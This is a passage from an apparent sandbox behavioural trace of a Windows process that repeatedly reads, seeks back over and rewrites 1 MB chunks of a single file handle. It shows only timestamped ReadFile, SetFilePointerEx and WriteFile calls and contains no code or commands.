lpNewFilePointer=0xffffffff) returned 1 [0043.266] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0043.268] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0043.282] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0043.283] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0043.285] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0043.304] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0043.305] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0043.308] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0043.322] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0043.324] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0043.330] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0043.440] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0043.440] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0043.442] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0043.489] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0043.489] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0043.492] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0043.508] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0043.508] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0043.511] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0043.593] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0043.601] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0043.630] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0043.647] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0043.647] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0043.654] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0043.677] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0043.678] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0043.738] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0043.822] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0043.822] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0043.825] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0043.843] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0043.843] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0043.846] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0043.960] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0043.961] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0043.963] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0043.980] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0043.981] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0043.983] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0044.000] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0044.000] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0044.011] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0044.023] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0044.024] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0044.026] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0044.046] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0044.046] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0044.049] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0044.078] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0044.078] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0044.080] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0044.305] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0044.305] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0044.309] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0044.395] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0044.395] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0044.397] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0044.559] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0044.559] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0044.562] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0044.578] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0044.578] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0044.581] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0044.646] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0044.646] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0044.649] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0044.663] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0044.664] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0044.667] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0044.773] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0044.773] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0044.775] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0044.788] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0044.788] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0044.790] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0044.802] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0044.802] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0044.804] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0044.850] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0044.850] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0044.852] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0044.878] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0044.878] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0044.881] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0044.896] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0044.896] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0044.899] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0044.916] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0044.916] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0044.918] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0044.948] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0044.948] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0044.950] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0044.984] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0044.984] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0044.989] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0045.030] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0045.030] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0045.033] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0045.068] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0045.068] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0045.070] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0045.094] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0045.094] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0045.099] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0045.133] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0045.133] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0045.136] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0045.182] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0045.182] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0045.184] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0045.203] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0045.203] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, 